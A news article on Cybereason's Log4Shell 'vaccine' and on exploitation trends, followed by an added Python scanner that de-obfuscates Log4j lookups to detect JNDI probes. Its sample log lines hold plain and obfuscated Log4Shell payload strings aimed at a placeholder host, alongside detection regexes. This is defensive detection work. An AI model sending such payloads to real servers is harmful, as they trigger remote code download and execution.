Researchers at Massachusetts-based cybersecurity company Cybereason have developed and released (on GitHub) a fix that will disable the Apache Log4Shell vulnerability (CVE-2021-44228).
Log4Shell is a remote code execution (RCE) vulnerability that was detected early this month in Apache Log4j version 2, an open-source Java logging library that is used in one-third of all web servers across the world. The vulnerability affects all major applications and cloud service providers.
Cybereason is calling the fix a “vaccine” to highlight the fact that it uses the vulnerability to mitigate itself, in the same way that a vaccine develops immunity by imitating the infection. “Because the vulnerability is so easy to exploit and so ubiquitous—it's one of the very few ways to close it in certain scenarios,” Yonatan Striem-Amit, CTO and co-founder of Cybereason, wrote in a blog post.
“You can permanently close the vulnerability by causing the server to save a configuration file, but that can be difficult. The simplest solution is to set up a server that will download and then run a class that changes the server's configuration to not load things anymore,” he added.
Striem-Amit also clarified that the fix developed by his company is not a patch, and said companies will still have to update their Apache systems to permanently address the vulnerability.
However, “patching takes time, and some systems may not be able to be updated immediately—or at all,” he warned. According to Striem-Amit, the fix will disable the vulnerability and buy organisations more time to assess and update their servers.
Security experts have given Log4Shell a severity rating of 10, which makes it highly dangerous.
The vulnerability allows attackers to take control of any Java-based web server and execute code remotely. According to security experts, it can be exploited by sending a malicious code string that gets logged by Log4j.
Though the vulnerability was initially exploited for crypto mining, it is now being used to target organisations. According to cybersecurity company Check Point, of the 820 exploit attempts against the vulnerability that it has prevented, 46% came from known malicious groups.
Check Point also detected exploit attempts against more than 36.8% of corporate networks globally.
Microsoft's findings show that the majority of attacks it detected were related to mass scanning by attackers attempting to identify vulnerable systems.
Microsoft also found that attackers have started using obfuscation techniques to avoid detections based on request patterns.
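The two points above, that exploitation is a malicious string that gets logged, and that attackers obfuscate the string to evade pattern-based detection, are illustrated by the following added example. It is not code from the article or from Cybereason: it is a small log scanner that resolves Log4j-style lookups the way the library would (case-folding lookups, the `${x:-default}` form, URL encoding) before checking for a JNDI lookup, so the obfuscated variants collapse to the same detectable form. The sample log lines and the host name EXAMPLE-HOST are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (a body with no nested braces inside it).
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup naming one of the protocol handlers Log4j would dispatch to.
_JNDI = re.compile(r"jndi:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)", re.I)

def _resolve(body: str) -> str:
    """Collapse one innermost lookup the way Log4j 2 would evaluate it.

    Obfuscated probes hide the literal "jndi" behind lookups such as
    ${lower:J}, ${upper:j}, ${::-j} or ${env:MISSING:-j}, each of which
    evaluates to a single character; the detector mirrors that evaluation.
    """
    prefix, sep, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return body                    # keep the jndi: lookup itself visible
    if ":-" in body:                   # default-value syntax: ${x:-default}
        return body.split(":-", 1)[1]
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return rest if sep else body       # any other lookup: drop the prefix

def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve lookups innermost-first until the string stops changing."""
    text = unquote(text)               # access logs often keep %24%7B for ${
    for _ in range(max_rounds):
        new = _LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, carries a JNDI lookup."""
    return bool(_JNDI.search(normalize(line)))

def flagged_lines(lines):
    """Indices of the log lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]

# Constructed sample access-log lines (not real traffic; EXAMPLE-HOST is a placeholder).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://EXAMPLE-HOST/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://EXAMPLE-HOST/a}"',
    '10.0.0.8 - - "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2FEXAMPLE-HOST%2Fa%7D HTTP/1.1" 404 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${sys:user.home} ${date:yyyy}"',
]
```

Running `flagged_lines(SAMPLE_LOG)` flags lines 1 to 3 and leaves the benign lookups in line 4 alone; a rule that only matches the literal text `${jndi:` would miss lines 2 and 3.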